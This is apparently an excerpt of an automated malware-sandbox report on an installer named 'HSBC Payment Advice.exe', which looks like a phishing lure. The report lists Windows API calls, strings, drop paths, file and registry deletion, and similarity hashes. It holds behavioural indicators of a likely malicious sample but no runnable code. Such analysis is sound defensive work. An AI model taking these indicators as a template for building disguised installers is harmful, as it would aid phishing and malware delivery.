          • DeleteObject.GDI32(00000000), ref: 00404C04
          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
          • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
          • ShowWindow.USER32(?,00000005), ref: 00404D5E
          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
          • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
          • GlobalFree.KERNEL32(?), ref: 00404F3E
          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
          • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
          • ShowWindow.USER32(?,00000000), ref: 004050DD
          • GetDlgItem.USER32(?,000003FE), ref: 004050E8
          • ShowWindow.USER32(00000000), ref: 004050EF
          Similarity
          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
          • String ID: $M$N
          • API String ID: 1638840714-813528018
          • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
          • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
          • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
          • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
          APIs
          • GetDlgItem.USER32(?,000003FB), ref: 00404617
          • SetWindowTextW.USER32(00000000,?), ref: 00404641
          • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
          • CoTaskMemFree.OLE32(00000000), ref: 004046FD
          • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
          • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
            • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061DF
            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061F3
            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00406206
          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
          Similarity
          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
          • String ID: eremo$$: Completed$A$C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion
          • API String ID: 2246997448-1504978202
          • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
          • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
          • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
          • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
          APIs
          • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 00405799
          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 004057E1
          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 00405804
          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 0040580A
          • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76702EE0,"C:\Users\user\Desktop\HSBC Payment Advice.exe"), ref: 0040581A
          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
          • FindClose.KERNEL32(00000000), ref: 004058C9
          Strings
          • "C:\Users\user\Desktop\HSBC Payment Advice.exe", xrefs: 00405779
          • \*.*, xrefs: 004057DB
          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
          Similarity
          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
          • API String ID: 2035342205-876224079
          • Opcode ID: 2ba9f686f30b98943ed184ebf5661942f4c7cdb8ba3d698b6b7e4259e8a17ddf
          • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
          • Opcode Fuzzy Hash: 2ba9f686f30b98943ed184ebf5661942f4c7cdb8ba3d698b6b7e4259e8a17ddf
          • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
          APIs
          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
          • GetDlgItem.USER32(?,000003E8), ref: 0040437C
          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
          • GetSysColor.USER32(?), ref: 004043AA
          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
          • lstrlenW.KERNEL32(?), ref: 004043CB
          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
          • GetDlgItem.USER32(?,0000040A), ref: 00404446
          • SendMessageW.USER32(00000000), ref: 0040444D
          • GetDlgItem.USER32(?,000003E8), ref: 00404478
          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
          • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
          • SetCursor.USER32(00000000), ref: 004044CC
          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
          • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
          • SetCursor.USER32(00000000), ref: 004044F0
          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
          Similarity
          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
          • String ID: : Completed$AB@$N$open
          • API String ID: 3615053054-1317861079
          • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
          • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
          • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
          • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
          APIs
          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
          • wsprintfA.USER32 ref: 00405C7E
          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
          • GlobalFree.KERNEL32(00000000), ref: 00405D6F
          • CloseHandle.KERNEL32(00000000), ref: 00405D76
            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
          Similarity
          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
          • API String ID: 1265525490-3322868524
          • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
          • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
          • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
          • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
          APIs
          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
          • BeginPaint.USER32(?,?), ref: 00401047
          • GetClientRect.USER32(?,?), ref: 0040105B
          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
          • DeleteObject.GDI32(?), ref: 004010ED
          • CreateFontIndirectW.GDI32(?), ref: 00401105
          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
          • SelectObject.GDI32(00000000,?), ref: 00401140
          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
          • SelectObject.GDI32(00000000,00000000), ref: 00401160
          • DeleteObject.GDI32(?), ref: 00401165
          • EndPaint.USER32(?,?), ref: 0040116E
          Similarity
          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
          • String ID: F
          • API String ID: 941294808-1304234792
          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
          APIs
          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061DF
          • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
          • CharNextW.USER32(?,"C:\Users\user\Desktop\HSBC Payment Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 004061F3
          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00406206
          Similarity
          • API ID: Char$Next$Prev
          • String ID: "C:\Users\user\Desktop\HSBC Payment Advice.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
          • API String ID: 589700163-2863286114
          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
          • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
          • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
          APIs
          • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
          • GetSysColor.USER32(00000000), ref: 004041CD
          • SetTextColor.GDI32(?,00000000), ref: 004041D9
          • SetBkMode.GDI32(?,?), ref: 004041E5
          • GetSysColor.USER32(?), ref: 004041F8
          • SetBkColor.GDI32(?,?), ref: 00404208
          • DeleteObject.GDI32(?), ref: 00404222
          • CreateBrushIndirect.GDI32(?), ref: 0040422C
          Similarity
          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
          • String ID:
          • API String ID: 2320649405-0
          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
          • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
          • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
          APIs
          • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
            • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
          • String ID: 9
          • API String ID: 1149667376-2366072709
          • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
          • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
          • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
          • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
          APIs
          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
          • GlobalFree.KERNEL32(00000000), ref: 00402875
          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
          Similarity
          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
          • String ID:
          • API String ID: 3294113728-0
          • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
          • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
          • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
          • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
          APIs
          • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,truckled\Spaanskraberne198,00000400,?,?,00000021), ref: 0040252D
          • lstrlenA.KERNEL32(truckled\Spaanskraberne198,?,?,0040A580,000000FF,truckled\Spaanskraberne198,00000400,?,?,00000021), ref: 00402534
          • WriteFile.KERNEL32(00000000,?,truckled\Spaanskraberne198,00000000,?,?,00000000,00000011), ref: 00402566
          Strings
          Similarity
          • API ID: ByteCharFileMultiWideWritelstrlen
          • String ID: 8$truckled\Spaanskraberne198
          • API String ID: 1453599865-3066209257
          • Opcode ID: e65311729cd25a9fde1851530528e05ef132e905d6e37bdd957c59a724d10906
          • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
          • Opcode Fuzzy Hash: e65311729cd25a9fde1851530528e05ef132e905d6e37bdd957c59a724d10906
          • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
          APIs
          • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
          • GetTickCount.KERNEL32 ref: 00402D51
          • wsprintfW.USER32 ref: 00402D7F
            • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
            • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
            • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
          • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
          • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
            • Part of subcall function 00402CFC: MulDiv.KERNEL32(00058F7C,00000064,0005F115), ref: 00402D11
          Strings
          Similarity
          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
          • String ID: ... %d%%
          • API String ID: 722711167-2449383134
          • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
          • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
          • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
          • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
          APIs
          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
          • GetMessagePos.USER32 ref: 00404A7F
          • ScreenToClient.USER32(?,?), ref: 00404A99
          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
          Strings
          Similarity
          • API ID: Message$Send$ClientScreen
          • String ID: f
          • API String ID: 41195575-1993550816
          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
          • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
          • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
          APIs
          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
          • wsprintfW.USER32 ref: 00402CCF
          • SetWindowTextW.USER32(?,?), ref: 00402CDF
          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
          Strings
          Similarity
          • API ID: Text$ItemTimerWindowwsprintf
          • String ID: unpacking data: %d%%$verifying installer: %d%%
          • API String ID: 1451636040-1158693248
          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
          • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
          • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
          APIs
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
          • RegCloseKey.ADVAPI32(?), ref: 00402BDE
          • RegCloseKey.ADVAPI32(?), ref: 00402C03
          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
          Similarity
          • API ID: Close$DeleteEnumOpen
          • String ID:
          • API String ID: 1912718029-0
          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
          • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
          • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
          APIs
          • GetDlgItem.USER32(?,?), ref: 00401CEB
          • GetClientRect.USER32(00000000,?), ref: 00401CF8
          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
          • DeleteObject.GDI32(00000000), ref: 00401D36
          Similarity
          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
          • String ID:
          • API String ID: 1849352358-0
          • Opcode ID: 61ac965e6a97560830dd210d4b93085389fca879a077f1281721c05f34562f3a
          • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
          • Opcode Fuzzy Hash: 61ac965e6a97560830dd210d4b93085389fca879a077f1281721c05f34562f3a
          • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
          APIs
          • GetDC.USER32(?), ref: 00401D44
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
          • ReleaseDC.USER32(?,00000000), ref: 00401D71
          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
          Similarity
          • API ID: CapsCreateDeviceFontIndirectRelease
          • String ID:
          • API String ID: 3808545654-0
          • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
          • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
          • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
          • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
          APIs
          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
          • wsprintfW.USER32 ref: 00404A10
          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
          Strings
          Similarity
          • API ID: ItemTextlstrlenwsprintf
          • String ID: %u.%u%s%s
          • API String ID: 3540041739-3551169577
          • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
          • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
          • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
          • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
          APIs
          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
          Strings
          Similarity
          • API ID: MessageSend$Timeout
          • String ID: !
          • API String ID: 1777923405-2657877971
          • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
          • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
          • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
          • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
          APIs
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E00
          • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
          Strings
          Similarity
          • API ID: CloseOpenQueryValue
          • String ID: : Completed
          • API String ID: 3677997916-2954849223
          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
          • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
          • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
          APIs
          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00405939
          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76703420,00403510), ref: 00405943
          • lstrcatW.KERNEL32(?,00409014), ref: 00405955
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
          Memory Dump Source
